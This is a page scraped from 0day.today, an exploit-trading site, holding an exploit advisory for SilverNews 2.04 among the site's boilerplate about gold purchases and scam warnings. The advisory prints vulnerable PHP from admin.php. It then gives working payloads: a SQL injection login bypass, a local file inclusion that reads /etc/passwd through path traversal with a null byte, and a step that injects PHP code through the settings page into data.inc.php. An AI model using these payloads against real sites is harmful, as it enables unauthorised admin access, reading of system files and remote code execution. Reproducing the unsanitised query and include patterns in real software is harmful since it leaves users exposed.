0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SilverNews 2.04 (Auth Bypass/LFI/RCE) Multiple Vulnerabilities
============================================================== SilverNews 2.04 (Auth Bypass/LFI/RCE) Multiple Vulnerabilities ============================================================== ######################################################################################### [0x01] Informations: Name : SilverNews 2.04 Download : http://www.silver-scripts.de/scripts.php?script=SilverNews&l=en Vulnerability : Auth Bypass\LFI\RCE Author : x0r Notes : Proud to be Italian ######################################################################################### [0x02] Bug: Bugged file is /[path]/admin.php [Code] // Get the user information from the database $getinfo = $sql->query("SELECT password, username, id FROM sn".$sql->prefix."_user WHERE username = '".$_POST['username']."' AND password = '".$_POST['password']."'"); $info = $sql->fetch_array($getinfo); ... // If "act" isn't set the user will be sent to the homepage. if (!$_GET['act'] AND !$_POST['act'] AND !$_GET['section']) { $_GET['section'] = 'home'; } require "admin/header.php"; if (file_exists('admin/'.$_GET['section'].".php")) { require 'admin/'.$_GET['section'].'.php'; #LFI } else { $admin->error('Datei konnte nicht gefunden werden!'); } require "admin/footer.php"; [/code] ######################################################################################### ######################################################################################### [0x03] Exploit: Exploit: username: ' or '1=1 password: x0r LFI: admin.php?section=../../../../../../../../../../etc/passwd%00 RCE: So we can bypass the admin login and then go to admin/settings.php and put your evil code ^^ ex: 'show_cat_prefix' => $_POST['show_cat_prefix'], in the sho_cat_prefix we put: x0r'; echo 'lol --> /data.inc.php ######################################################################################## # 0day.today [2024-11-14] #